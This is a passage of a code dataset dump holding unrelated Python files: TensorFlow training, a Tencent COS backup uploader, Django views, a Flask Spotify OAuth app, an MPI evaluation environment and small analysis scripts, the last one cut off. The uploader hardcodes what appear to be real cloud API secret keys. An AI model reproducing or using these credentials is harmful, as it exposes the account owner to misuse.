= 0\n return out\n\ny_train, y_test, y_dev = y_logger(y_train), y_logger(y_test), y_logger(y_dev)\n\n\n'''\nNN structure\ninput -> RELU -> RELU\n\nmake data into correct shape.\nX has observations stacked vertically. Rows = features, columns = observations\nThis is the current format of the dataset\n'''\n\ndef create_placeholders():\n\n X = tf.placeholder(tf.float32, [13, None], name=\"X\")\n Y = tf.placeholder(tf.float32, [1, None], name=\"Y\")\n\n return X, Y\n\ndef initialise_parameters():\n W1 = tf.get_variable(\"W1\", [10, 13], initializer=tf.contrib.layers.xavier_initializer(seed=1))\n b1 = tf.get_variable(\"b1\", [10, 1], initializer=tf.zeros_initializer())\n W2 = tf.get_variable(\"W2\", [5, 10], initializer=tf.contrib.layers.xavier_initializer(seed=1))\n b2 = tf.get_variable(\"b2\", [5, 1], initializer=tf.zeros_initializer())\n W3 = tf.get_variable(\"W3\", [1, 5], initializer=tf.contrib.layers.xavier_initializer(seed=1))\n b3 = tf.get_variable(\"b3\", [1, 1], initializer=tf.zeros_initializer())\n\n parameters = {\n \"W1\": W1\n , \"b1\": b1\n , \"W2\": W2\n , \"b2\": b2\n , \"W3\": W3\n , \"b3\": b3\n }\n\n return parameters\n\ndef forward_propagation(X, parameters):\n\n # Retrieve the parameters from the dictionary \"parameters\"\n W1 = parameters['W1']\n b1 = parameters['b1']\n W2 = parameters['W2']\n b2 = parameters['b2']\n W3 = parameters['W3']\n b3 = parameters['b3']\n\n\n Z1 = tf.add(tf.matmul(W1, X), b1)\n A1 = tf.nn.relu(Z1)\n Z2 = tf.add(tf.matmul(W2, A1), b2)\n A2 = tf.nn.relu(Z2)\n Z3 = tf.add(tf.matmul(W3, A2), b3)\n A3 = tf.nn.relu(Z3)\n\n return A3\n\n\n# COST FUNCTION\ndef compute_cost(y_hat, y):\n\n cost = tf.reduce_mean(tf.square(y_hat - y))\n\n return cost\n\ndef model(X_train\n ,y_train\n ,X_dev\n ,y_dev\n ,test_data\n ,learning_rate = 0.000001\n ,num_epochs = 1000\n ,print_cost = True\n ):\n\n tf.reset_default_graph()\n\n costs = [] # To keep track of the cost\n X, Y = create_placeholders()\n\n # Initialize parameters\n parameters = initialise_parameters()\n\n y_hat = forward_propagation(X, parameters)\n\n cost = compute_cost(y_hat, Y)\n\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(cost)\n # Alternative\n #optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n\n init = tf.global_variables_initializer()\n\n with tf.Session() as sess:\n # Run the initialization\n sess.run(init)\n\n\n # Do the training loop\n for epoch in range(num_epochs):\n _, epoch_cost = sess.run([optimizer, cost], feed_dict={X: X_train, Y: y_train})\n costs.append(epoch_cost)\n\n\n if print_cost == True and epoch % 100 == 0:\n print (\"Cost after epoch %i: %f\" % (epoch, epoch_cost))\n if print_cost == True and epoch % 5 == 0:\n costs.append(epoch_cost)\n\n # get the parameters out of the model\n parameters = sess.run(parameters)\n print(\"Parameters have been trained!\")\n\n # make predictions for manual inspection\n train_predictions = sess.run(y_hat, feed_dict={X:X_train})\n dev_predictions = sess.run(y_hat, feed_dict={X:X_dev})\n test_predictions = sess.run(y_hat, feed_dict={X:test_data})\n\n predictions = {\n \"train_predictions\": train_predictions\n ,\"dev_predictions\": dev_predictions\n ,\"test_predictions\": test_predictions\n }\n\n dev_cost = sess.run(cost, feed_dict={X:X_dev, Y:y_dev})\n\n\n print(\"Train MSE:\", costs[-1])\n print(\"Test MSE:\", dev_cost)\n\n plt.plot(costs)\n\n return parameters, predictions\n\n\n\nparameters, predictions = model(\n X_train\n , y_train\n , X_dev\n , y_dev\n ,submission_features\n 
, learning_rate=0.001\n , num_epochs=1500\n , print_cost=True\n)\n\n\nexpon_predictions = {k: np.exp(v) for k,v in predictions.items()}\nexpon_y_train = np.exp(y_train)\nexpon_y_dev = np.exp(y_dev)\n\ndef mse(y_hat, y):\n mse = np.mean(np.square(y_hat - y))\n return mse\n\ndef rmsle(y, y_hat):\n return np.sqrt(np.mean(np.power(np.log1p(y)-np.log1p(y_hat), 2)))\n\nrmsle(expon_predictions[\"train_predictions\"], expon_y_train)\nrmsle(expon_predictions[\"dev_predictions\"], expon_y_dev)\n\ntest_predictions = expon_predictions[\"test_predictions\"]\n'''\n# FOR WRITING\nimport Data_Import\nimport pandas as pd\n_, _, _, _, submission_data, _ = Data_Import.get_data()\n\noutput = submission_data\noutput.sales = test_predictions.T.reshape(test_predictions.T.shape[0],)\n\noutput.to_csv(\"C://Users/robwh/PycharmProjects/EAN_Hotel_Sales_Prediction/submission_scored.csv\", encoding='utf-8', index=False)\n'''","sub_path":"TensorFlow_Models.py","file_name":"TensorFlow_Models.py","file_ext":"py","file_size_in_byte":5044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"476429418","text":"# -*- coding: utf-8 -*-\n# auther: Joe wen\n\nimport os, sys, time, re, json, urllib\nfrom datetime import datetime, timedelta\nfrom qcloud_cos import CosClient, UploadFileRequest, StatFileRequest, ListFolderRequest, DelFileRequest,DelFolderRequest, CreateFolderRequest\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nappid = \"1251180962\"\nsecret_id = u'AKID9Bg4HI4kBSXQ7ev85vZ0JTSFrHVXq1Sm'\nsecret_key = u'HOJ2ZuujLlySnw8PbdT9duyqY9YmoeIw'\nregion_info = 'gz'\nbucket = u'backup'\n# remotepath = u'/user.txt'\n# localpath = u'/user.txt'\n# remotefolder = '/abab/'\n#localpath = u'/Users/joe/Documents/tutory_python/03/'\n\nallfolder_name = []\nallfile_name = []\nfilepath = \"/Users/joe/Downloads/test\"\nfilepath_len = len(filepath)\n\ndef Screendir(filepath):\n for alldir in os.listdir(filepath):\n child = os.path.join(filepath, alldir)\n if os.path.isdir(child):\n allfolder_name.append(child)\n Screendir(child)\n else:\n allfile_name.append(child)\n return allfolder_name, allfile_name\n # print(child.decode('utf8'))\n\ndef Uploadfile(cos_client,bucket,remotepath,localpath):\n request = UploadFileRequest(bucket, remotepath, localpath)\n request.set_insert_only(0) #0是允许覆盖 1是不允许\n upload_file_ret = cos_client.upload_file(request)\n print(upload_file_ret['message'])\n if upload_file_ret['message'] == u'SUCCESS':\n print(localpath.encode('utf8') + '上传成功')\n elif upload_file_ret['message'] == u'ERROR_CMD_BUCKET_NOTEXIST':\n print('bucket错误,请重新检查bucker名称')\n elif upload_file_ret['message'] == u'ERROR_PROXY_AUTH_APPID':\n print('APPID错误')\n elif upload_file_ret['message'] == u'PROXY_AUTH_SECRETID_NOEXIST':\n print('secret_id错误')\n elif upload_file_ret['message'] == u'ERROR_PROXY_AUTH_FAILED':\n print('secret_key错误')\n else:\n print('other error')\n\ndef Createfolder(cos_client,bucket,remotefolder):\n request = CreateFolderRequest(bucket,remotefolder)\n create_folder_ret = cos_client.create_folder(request)\n print(repr(create_folder_ret['message']))\n if create_folder_ret['message'] == u'SUCCESS':\n print(remotefolder + '创建目录成功')\n elif create_folder_ret['message'] == u'ERROR_CMD_COS_PATH_CONFLICT':\n print('目录已存在')\n else:\n print('创建失败')\n\n\n\n\nScreendir(filepath)\n\n#print(allfolder_name, allfile_name)\n#folder_len = len(allfolder_name) -1\n\n\ncos_client = CosClient(int(appid), secret_id, secret_key, region=region_info)\n\nfor remotefolder in allfolder_name:\n folder_abs = 
os.path.join(filepath,remotefolder)\n    remotefolder = remotefolder[filepath_len:] + '/'\n    if folder_abs in allfolder_name:\n        Createfolder(cos_client, bucket, unicode(remotefolder))\n\nfor remotepath in allfile_name:\n    localpath = remotepath\n    file_abs = os.path.join(filepath,remotepath)\n    remotepath = remotepath[filepath_len:]\n\n    if file_abs in allfile_name:\n        Uploadfile(cos_client,bucket,unicode(remotepath),unicode(localpath))","sub_path":"02/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"221630857","text":"import re\n\nfrom django.shortcuts import render, HttpResponseRedirect, Http404\nfrom django.contrib.auth import logout, login, authenticate\nfrom django.contrib import messages\nfrom django.core.urlresolvers import reverse\n\n\nfrom .forms import LoginForm, RegistrationForm, UserAddressForm\nfrom .models import EmailConfirmed\n# Create your views here.\n\n\ndef logout_view(request):\n\tprint (\"logging out\")\n\tlogout(request)\n\tmessages.success(request, \"Successfully Logged out. Feel free to <a href='%s'>login again</a>.\" %(reverse(\"auth_login\")), extra_tags='safe, abc')\n\tmessages.warning(request, \"There's a warning.\")\n\tmessages.error(request, \"There's an error.\")\n\treturn HttpResponseRedirect('%s'%(reverse(\"auth_login\")))\n\ndef login_view(request):\n\tform = LoginForm(request.POST or None)\n\tbtn = \"connection\"\n\terror = False\n\ttitre = \"Connection\"\n\t\n\tif form.is_valid():\n\t\tusername = form.cleaned_data['username']\n\t\tpassword = form.cleaned_data['password']\n\t\tuser = authenticate(username=username, password=password)\n\t\tlogin(request, user)\n\t\tmessages.success(request, \"Successfully Logged In. Welcome Back!\")\n\t\terror = True\n\t\treturn HttpResponseRedirect(\"/\")\n\t\n\tconect = False\n\t\n\tcontext = {\n\t\t\"form\": form,\n\t\t\"conect\": conect,\n\t\t\"submit_btn\": btn,\n\t\t\"titre\": titre,\n\t}\n\treturn render(request, \"form.html\", context)\n\n\ndef registration_view(request):\n\tform = RegistrationForm(request.POST or None)\n\tbtn = \"s'enregistrer\"\n\ttitre = \"Enregistrement\"\n\t\n\tif form.is_valid():\n\t\tnew_user = form.save(commit=False)\n\t\tnew_user.save()\n\t\treturn HttpResponseRedirect(\"/\")\n\t\t\n\tconect = True\n\t\n\tcontext = {\n\t\t\"form\": form,\n\t\t\"conect\": conect,\n\t\t\"submit_btn\": btn,\n\t\t\"titre\": titre,\n\t}\n\treturn render(request, \"form.html\", context)\n\n\nSHA1_RE = re.compile('^[a-f0-9]{40}$')\n\ndef activation_view(request, activation_key):\n\tif SHA1_RE.search(activation_key):\n\t\tprint (\"activation key is real\")\n\t\ttry:\n\t\t\tinstance = EmailConfirmed.objects.get(activation_key=activation_key)\n\t\texcept EmailConfirmed.DoesNotExist:\n\t\t\tinstance = None\n\t\t\tmessages.success(request, \"There was an error with your request.\")\n\t\t\treturn HttpResponseRedirect(\"/\")\n\t\tif instance is not None and not instance.confirmed:\n\t\t\tpage_message = \"Confirmation Successful! Welcome.\"\n\t\t\tinstance.confirmed = True\n\t\t\tinstance.activation_key = \"Confirmed\"\n\t\t\tinstance.save()\n\t\t\tmessages.success(request, \"Successfully Confirmed! 
Please login.\")\n\t\telif instance is not None and instance.confirmed:\n\t\t\tpage_message = \"Already Confirmed\"\n\t\t\tmessages.success(request, \"Already Confirmed.\")\n\t\telse:\n\t\t\tpage_message = \"\"\n\n\t\tcontext = {\"page_message\": page_message}\n\t\treturn render(request, \"accounts/activation_complete.html\", context)\n\telse:\n\t\traise Http404\n\n\n\n\ndef add_user_address(request):\n\tprint (request.GET)\n\tform = UserAddressForm(request.POST or None)\n\tif request.method == \"POST\":\n\t\tif form.is_valid():\n\t\t\tnew_address = form.save(commit=False)\n\t\t\tnew_address.user = request.user\n\t\t\tnew_address.save()\n\t\t\treturn HttpResponseRedirect(\"/commander/\")\n\t\n\tsubmit_btn = \"Sauvegarder addresse\"\n\tform_title = \"Ajouter une nouvelle Adresse\"\n\treturn render(request, \"form_adres.html\", \n\t\t{\"form\": form,\n\t\t\"submit_btn\": submit_btn,\n\t\t\"form_title\": form_title,\n\t\t})\t","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"319736311","text":"from __future__ import print_function\n\nimport os\nfrom flask import Flask, json, request, redirect, render_template\nimport spotipy.oauth2 as oauth2\nimport spotipy\n\nSPOTIFY_SCOPES = ','.join([\n 'playlist-read-collaborative',\n 'user-read-currently-playing',\n 'user-modify-playback-state',\n 'user-read-playback-state',\n 'user-library-read',\n 'streaming',\n 'user-top-read',\n 'user-read-recently-played'\n])\n\napp = Flask(__name__)\n\nsp_oauth = oauth2.SpotifyOAuth(\n os.getenv('SPOTIFY_CLIENT_ID'),\n os.getenv('SPOTIFY_CLIENT_SECRET'),\n os.getenv('SPOTIFY_REDIRECT_URI'),\n scope=SPOTIFY_SCOPES,\n cache_path=\".cache-\" + os.getenv('SPOTIFY_USERNAME'))\n\nspotify = None\n\n\ndef main():\n global spotify\n\n spotify = spotipy.Spotify(auth=get_token())\n\n app.run('0.0.0.0')\n\n\ndef get_token():\n try:\n return open('spotify.token').read()\n except FileNotFoundError:\n return None\n\n\ndef set_token(token):\n open('spotify.token').write(token)\n\n\n@app.route('/')\ndef hello_world():\n return render_template('index.html')\n\n\n@app.route('/auth/login')\ndef auth_login():\n token = sp_oauth.get_cached_token()\n\n if not token:\n return redirect(sp_oauth.get_authorize_url())\n\n return redirect('/')\n\n\n@app.route('/auth/callback')\ndef auth_callback():\n code = sp_oauth.parse_response_code(request.url)\n token_info = sp_oauth.get_access_token(code)\n\n # Auth'ed API request\n print('token info %s' % token_info['access_token'])\n\n token = token_info['access_token']\n\n if token:\n set_token(token)\n\n return redirect('/')\n\n return redirect('/auth/login')\n\n\n@app.route('/test')\ndef test():\n # return json.dumps(sp_client.me())\n return json.dumps(spotify._get('me/player'))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"36399929","text":"#!/usr/bin/env python\nimport numpy as np\nimport sys, time,traceback\nimport argparse\nfrom pathlib import Path\nsys.path.append(str(Path(__file__).absolute().parent.parent.parent))\nfrom mpi4py import MPI\nimport time\n\nfrom shiva.helpers.utils.Tags import Tags\nfrom shiva.envs.Environment import Environment\nfrom shiva.helpers.config_handler import load_class\nfrom shiva.helpers.misc import terminate_process\nfrom 
shiva.core.admin import logger\n\n\nclass MPIEvalEnv(Environment):\n\n def __init__(self):\n self.eval = MPI.Comm.Get_parent()\n self.id = self.eval.Get_rank()\n self.info = MPI.Status()\n self.launch()\n\n def launch(self):\n \"\"\" Launches environments, creates buffers, tells MPIEvaluation it started.\n\n Return:\n None\n \"\"\"\n # Receive Config from MPI Evaluation Object\n self.configs = self.eval.bcast(None, root=0)\n super(MPIEvalEnv, self).__init__(self.configs)\n self._launch_env()\n self.eval.gather(self._get_env_specs(), root=0)\n\n '''Set function to be run'''\n if 'Gym' in self.type or 'Unity' in self.type or 'ParticleEnv' in self.type:\n self.send_evaluations = self._send_eval_roles\n elif 'RoboCup' in self.type:\n self.send_evaluations = self._send_eval_robocup\n\n self.create_buffers()\n\n start_flag = self.eval.bcast(None, root=0)\n self.log(\"Start collecting..\", verbose_level=1)\n self.run()\n\n def run(self):\n \"\"\" Starts environments and collects trajectories.\n\n Returns:\n None\n \"\"\"\n self.env.reset()\n\n while True:\n while self.env.start_env():\n self._step_python()\n # self._step_numpy()\n if self.env.is_done(n_episodes=self.configs['Evaluation']['eval_episodes']):\n self.send_evaluations()\n self.env.reset(force=False)\n\n # if self.eval.Iprobe(source=MPI.ANY_SOURCE, tag=Tags.clear_buffers, status=self.info):\n # _ = self.eval.recv(None, source=self.info.Get_source(), tag=Tags.clear_buffers)\n # self.reset_buffers()\n # print('Buffers resets')\n # self.close()\n\n def _step_python(self):\n self.observations = self.env.get_observations()\n self.eval.gather(self.observations, root=0)\n self.actions = self.eval.scatter(None, root=0)\n self.next_observations, self.rewards, self.dones, _ = self.env.step(self.actions)\n self.log(\"Acs {} Obs {}\".format(self.actions, self.observations), verbose_level=3)\n\n def _step_numpy(self):\n self.observations = self.env.get_observations()\n send_obs_buffer = np.array(self.observations, dtype=np.float64)\n self.eval.Gather([send_obs_buffer, MPI.DOUBLE], None, root=0)\n\n if 'Gym' in self.type or 'Unity' in self.type or 'ParticleEnv' in self.type:\n self.actions = self.eval.scatter(None, root=0)\n self.next_observations, self.rewards, _, _ = self.env.step(self.actions.tolist())\n # elif 'Gym' in self.type:\n # self.actions = self.eval.scatter(None, root=0)\n # self.next_observations, self.rewards, self.dones, _ = self.env.step(self.actions.tolist())\n # # if self.env.done:\n # # self._send_eval(self.env.reward_per_episode, 0)\n # # self.env.reset()\n elif 'RoboCup' in self.type:\n recv_action = np.zeros((self.env.num_agents, self.env.action_space['acs_space']), dtype=np.float64)\n self.eval.Scatter(None, [recv_action, MPI.DOUBLE], root=0)\n self.actions = recv_action\n self.next_observations, self.rewards, self.dones, _, self.metrics = self.env.step(self.actions, evaluate=True)\n # if self.dones:\n # self._send_eval(self.metrics, 0)\n # self.env.reset()\n self.log(\"Obs {} Act {}\".format(self.observations, self.actions), verbose_level=3)\n\n '''\n Roles Methods\n '''\n\n def _send_eval_roles(self):\n if 'UnityWrapperEnv1' in self.type:\n # Need to calculate the mean reward for all the simulations within the one Unity environment\n # g.i. 
3DBall has 16 simulations within one Unity Environment, so we take the average across 16 agents\n reward_per_episode = {}\n for role in self.env.roles:\n reward_per_episode[role] = []\n for role_agent_id in self.env.trajectory_ready_agent_ids[role]:\n while len(self.env._ready_trajectories[role][role_agent_id]) > 0:\n _, _, _, _, _, agent_metric = self.env._ready_trajectories[role][role_agent_id].pop()\n # self.log(f\"Agent_metric {role} {role_agent_id} {agent_metric}\")\n for metric_name, value in agent_metric:\n if metric_name == 'Reward/Per_Episode':\n reward_per_episode[role].append(value)\n reward_per_episode[role] = sum(reward_per_episode[role]) / len(reward_per_episode[role])\n metric = {\n 'reward_per_episode': reward_per_episode\n }\n else:\n metric = {\n 'reward_per_episode': self.env.get_reward_episode(roles=True) # dict() that maps role_name->reward\n }\n self.eval.send(metric, dest=0, tag=Tags.trajectory_eval)\n self.log(\"Sent metrics {}\".format(metric), verbose_level=2)\n\n '''\n Single Agent Methods\n '''\n\n def _send_eval_robocup(self):\n self._send_eval(self.metrics, 0)\n\n def _send_eval_gym(self):\n self._send_eval(self.env.reward_per_episode, 0)\n\n def _send_eval(self, episode_reward, agent_idx):\n self.eval.send(agent_idx, dest=0, tag=Tags.trajectory_eval)\n self.eval.send(episode_reward, dest=0, tag=Tags.trajectory_eval)\n self.log('Eval Reward: {}'.format(episode_reward), verbose_level=2)\n\n def create_buffers(self):\n \"\"\" Creates numpy buffers to store episodic rewards\n\n Returns:\n None\n \"\"\"\n if 'Unity' in self.type or 'ParticleEnv' in self.type:\n pass\n # self.episode_rewards = np.zeros((len(self.env.roles), self.episode_max_length))\n elif 'Gym' in self.type:\n pass\n # self.episode_rewards = np.zeros(1, self.episode_max_length)\n elif 'RoboCup' in self.type:\n self.episode_rewards = np.zeros((self.num_agents, self.episode_max_length))\n self.reward_idxs = dict()\n for i in range(self.num_agents): self.reward_idxs[i] = 0\n\n def reset_buffers(self):\n \"\"\" Empties the buffers after finishing a trajectory.\n\n Returns:\n None\n \"\"\"\n if 'Unity' in self.type:\n pass\n # self.episode_rewards.fill(0)\n elif 'Gym' in self.type:\n '''Gym - has only 1 agent per environment and no groups'''\n pass\n # self.episode_rewards.fill(0)\n # self.reward_idxs = 0\n elif 'RoboCup' in self.type:\n self.episode_rewards.fill(0)\n self.reward_idxs = dict()\n # for i in range(self.num_agents): self.reward_idxs[i] = 0\n\n def _launch_env(self):\n try:\n self.configs['Environment']['port'] += 500 + np.random.randint(0, 1500)\n self.configs['Environment']['worker_id'] = 1000 * (self.id * 22)\n self.configs['Environment']['render'] = self.configs['Evaluation']['render'] if 'render' in self.configs['Evaluation'] else False\n # self.configs['Environment']['rc_log'] = 'rc_eval_log'\n # self.configs['Environment']['server_addr'] = self.eval.Get_attr(MPI.HOST)\n except:\n pass\n env_class = load_class('shiva.envs', self.configs['Environment']['type'])\n self.env = env_class(self.configs)\n if 'UnityWrapperEnv1' in self.type:\n self.env.create_buffers()\n\n def _get_env_specs(self):\n return {\n 'type': self.type,\n 'id': self.id,\n 'observation_space': self.env.get_observation_space(),\n 'action_space': self.env.get_action_space(),\n 'num_agents': self.env.num_agents,\n 'roles': self.env.roles if hasattr(self.env, 'roles') else ['Agent_0'], # agents names given by the env - needs to be implemented by RoboCup\n 'num_instances_per_env': self.env.num_instances_per_env if 
hasattr(self.env, 'num_instances_per_env') else 1, # Unity case\n 'learners_port': self.learners_port if hasattr(self, 'learners_port') else False\n }\n\n def close(self):\n \"\"\" Closes the connection with MPIEvaluation\n\n Returns:\n None\n \"\"\"\n comm = MPI.Comm.Get_parent()\n comm.Disconnect()\n\n def log(self, msg, to_print=False, verbose_level=-1):\n \"\"\"If verbose_level is not given, by default will log\n Args:\n msg: Message to be loged\n to_print: Whether to print it\n verbose_level: When to print it\n\n Returns:\n None\n \"\"\"\n if verbose_level <= self.configs['Admin']['log_verbosity']['EvalEnv']:\n text = \"{}\\t\\t\\t{}\".format(str(self), msg)\n logger.info(text, to_print or self.configs['Admin']['print_debug'])\n\n def __str__(self):\n return \"\".format(self.id)\n\n def show_comms(self):\n \"\"\" Shows what MPIEvaluation this EvalEnv is connection to.\n Returns:\n None\n \"\"\"\n self.log(\"SELF = Inter: {} / Intra: {}\".format(MPI.COMM_SELF.Is_inter(), MPI.COMM_SELF.Is_intra()))\n self.log(\"WORLD = Inter: {} / Intra: {}\".format(MPI.COMM_WORLD.Is_inter(), MPI.COMM_WORLD.Is_intra()))\n self.log(\"MENV = Inter: {} / Intra: {}\".format(MPI.Comm.Get_parent().Is_inter(), MPI.Comm.Get_parent().Is_intra()))\n\n\nif __name__ == \"__main__\":\n try:\n env = MPIEvalEnv()\n except Exception as e:\n msg = \" error: {}\".format(MPI.Comm.Get_parent().Get_rank(), traceback.format_exc())\n print(msg)\n logger.info(msg, True)\n finally:\n terminate_process()\n","sub_path":"shiva/shiva/eval_envs/MPIEvalEnv.py","file_name":"MPIEvalEnv.py","file_ext":"py","file_size_in_byte":10278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"195422078","text":"from django.conf.urls import patterns, include, url\nfrom article.views import sample_advanced_url, article, articles, language, create\n#from django.contrib import admin\n#admin.autodiscover()\n\nurlpatterns = patterns('',\n\n url(r'^all$', articles),\n url(r'^get/(?P\\d+)/$', article),\n url(r'^language/(?P[a-z\\-]+)/$', language),\n url(r'^advancedurl$', sample_advanced_url),\n url(r'^advancedurl$', sample_advanced_url),\n url(r'^create', create),\n\n)\n","sub_path":"article/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"439436532","text":"import codecs\nimport os\nimport re\n\nfrom collections import (\n Counter\n)\n\nfrom Tools import (\n decode,\n encode,\n strip_punct\n# splitter,\n# tokenizer\n)\n\n\nPATH_TWENTY_NEWSGROUPS = 'data/20_newsgroups/'\n# PATH_TWENTY_NEWSGROUPS = '../data/20_newsgroups/'\n\nSEPARATOR = re.compile('.{1,30}:')\n\n\n\nclass TwentyNewsgroupsCorpusWrapper:\n\n def __init__(self):\n self.root = PATH_TWENTY_NEWSGROUPS\n self.documents = []\n self.paths = []\n self.tags = []\n self.i_by_tag = dict([])\n self.tagdist = Counter()\n self.__load()\n\n \n def __load(self):\n for category in os.listdir(self.root):\n category_folder = '%s%s' % (self.root, category)\n if not os.path.isdir(category_folder):\n continue\n for document_path in os.listdir(category_folder):\n document_path = '%s/%s' % (category_folder, document_path)\n text = self.__read(document_path)\n\n try:\n codecs.utf_8_decode(text)\n except Exception:\n continue\n\n# print text[:1500]\n# print category\n# print\n if not text:\n continue\n self.i_by_tag[document_path] = len(self.paths)\n self.paths.append(document_path)\n self.tags.append(category)\n 
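MPIEvalEnv above talks to its parent MPIEvaluation process over an intercommunicator obtained from MPI.Comm.Get_parent(). A stripped-down sketch of the child side of that handshake, mirroring the bcast/gather/scatter calls the record itself makes; it only runs when launched via MPI spawn from a parent that uses root=MPI.ROOT on its side, and the observation payload here is a placeholder:

from mpi4py import MPI

parent = MPI.Comm.Get_parent()          # intercomm back to the spawning process
configs = parent.bcast(None, root=0)    # receive the config broadcast
parent.gather({'obs': [0.0]}, root=0)   # ship this rank's observations up
actions = parent.scatter(None, root=0)  # receive this rank's actions back
parent.Disconnect()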
self.documents.append(text)\n self.tagdist[category] += 1\n \n \n def __read(self, document_path):\n with open(document_path, 'rb') as rd:\n lines = []\n for line in rd:\n try:\n line = encode(line)\n if SEPARATOR.match(line) or line.startswith('In article <') or \\\n line.startswith('>In article <'):\n continue\n lines.append(line)\n except Exception:\n pass\n return ''.join(lines)\n\n\n def fileids(self):\n for path in self.paths:\n yield path\n \n\n def words(self, path=None):\n\n if path == None:\n space = self.i_by_tag.values()\n else:\n space = [self.i_by_tag[path]]\n\n _words = []\n for i in space:\n text = self.documents[i]\n for w in text.split():\n token = strip_punct(w).lower()\n if token:\n _words.append(token)\n\n return _words\n\n\n def categories(self, path=None):\n\n if path == None:\n space = self.i_by_tag.values()\n else:\n space = [self.i_by_tag[path]]\n\n categories = [] \n for i in space:\n categories.append(self.tags[i])\n\n return categories\n","sub_path":"lib/TwentyNewsgroupsCorpusWrapper.py","file_name":"TwentyNewsgroupsCorpusWrapper.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"87676502","text":"\nfrom sklearn import svm\nimport time\nimport os\nimport numpy as np\nimport pandas as pd\nfrom sklearn.decomposition import PCA\n\n\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.preprocessing import StandardScaler, MaxAbsScaler, PowerTransformer\n\ntime_1 = time.time()\n\nprint('Prepare datasets...')\n\nlabels = []\nfeatures = []\npatients = []\nfor filename in os.listdir(\"input2/all/\"):\n raw_data = pd.read_csv(\"input2/all/\" + filename, header=0)\n f = raw_data[\"variance\"]\n features.append(f)\n x = filename.split(\"_\")[-1]\n x = x.split(\".\")[0]\n labels.append(x)\n x = filename.split(\"_\")[0]\n patients.append(x)\n\n\nfeatures2 = []\npatients2=[]\nfor filename in os.listdir(\"pure_input/all/\"):\n raw_data = pd.read_csv(\"pure_input/all/\" + filename, header=0,sep=\" \")\n f = raw_data.mean()\n features2.append(f)\n x = filename.split(\"_\")[0]\n patients2.append(x)\n\n\nfeatures2 = pd.DataFrame(features2)\nfeatures = pd.DataFrame(features)\n\nfrom sklearn.model_selection import LeaveOneOut\nloo = LeaveOneOut()\n\nm=[]\n\n\nlabels = np.array(labels)\nfor train_index, test_index in loo.split(features):\n X_train, X_test = features.iloc[train_index,:], features.iloc[test_index,:]\n X_train2, X_test2 = features2.iloc[train_index,:], features2.iloc[test_index,:]\n y_train, y_test = labels[train_index], labels[test_index]\n\n\n pca = PCA(n_components=2, whiten=True)\n pca.fit(X_train)\n X_train = pca.transform(X_train)\n X_test = pca.transform(X_test)\n\n pca = PCA(n_components=2, whiten=True)\n pca.fit(X_train2)\n X_train2 = pca.transform(X_train2)\n X_test2 = pca.transform(X_test2)\n\n\n\n clf = KNeighborsClassifier(n_neighbors=3)\n clf.fit(X_train, y_train)\n\n clf2 = KNeighborsClassifier(n_neighbors=3)\n clf2.fit(X_train2, y_train)\n\n test_predict = clf.predict(X_test)\n test_predict2 = clf2.predict(X_test2)\n\n\n e1=0\n if(test_predict!=y_test):\n #print(\"real value : \"+str(y_test)+\" , predicted : \"+str(test_predict))\n e1=1\n\n e2=0\n if(test_predict2!=y_test):\n #print(\"real value : \"+str(y_test)+\" , predicted : \"+str(test_predict))\n e2=1\n\n\n print(e1)\n print(e2)\n e=e1-e2\n print(e)\n m.append(e)\n\n\nprint(m)\ns = np.std(m)\ns = s/np.sqrt(len(m)-1)\n\na = np.mean(m)\n\n# t statistic\nt = a/s\n\nprint(t)\n\n\n### output : 
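The leave-one-out script above accumulates per-fold error differences e1 - e2 and forms a paired t statistic by hand at the end, dividing the mean by std/sqrt(n-1). The same estimator as a small reusable helper, matching the script's combination of the population std with an n-1 correction in the denominator:

import numpy as np

def paired_t_statistic(diffs):
    # diffs[i] = error of model 1 minus error of model 2 on fold i
    d = np.asarray(diffs, dtype=float)
    se = np.std(d) / np.sqrt(len(d) - 1)   # np.std defaults to ddof=0 here
    return np.mean(d) / se

print(paired_t_statistic([1, 0, 1, -1, 0, 1]))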
0.9999999999999999\n\n\n","sub_path":"SVCA_Analysis/fisrst_vs_second.py","file_name":"fisrst_vs_second.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"194143310","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nSMALL_SIZE = 30\nMEDIUM_SIZE = 40\nBIGGER_SIZE = 50\n\nplt.rc('font', size=SMALL_SIZE) # controls default text sizes\nplt.rc('axes', titlesize=SMALL_SIZE) # fontsize of the axes title\nplt.rc('axes', labelsize=MEDIUM_SIZE) # fontsize of the x and y labels\nplt.rc('xtick', labelsize=SMALL_SIZE) # fontsize of the tick labels\nplt.rc('ytick', labelsize=SMALL_SIZE) # fontsize of the tick labels\nplt.rc('legend', fontsize=SMALL_SIZE) # legend fontsize\nplt.rc('figure', titlesize=BIGGER_SIZE) # fontsize of the figure title\n\npi = np.pi\n\nTemp = (1e3/(1.16e4) *1e-9) # Neutron star temperature in GeV\nneutron_mass = (0.939) # mass of neutron in GeV\ntherm_time = (1e10 *3.154e7 /(6.58e-16) * 1e9)# in GeV^-1\n\ndef coupling_squared_bert(DM_mass):\n k_n = np.sqrt(4*DM_mass*Temp)\n k_0 = DM_mass/3\n\n bracket = (1/(k_n)**4 - 1/(k_0)**4)\n numerator = 105 * pi**3 * DM_mass * 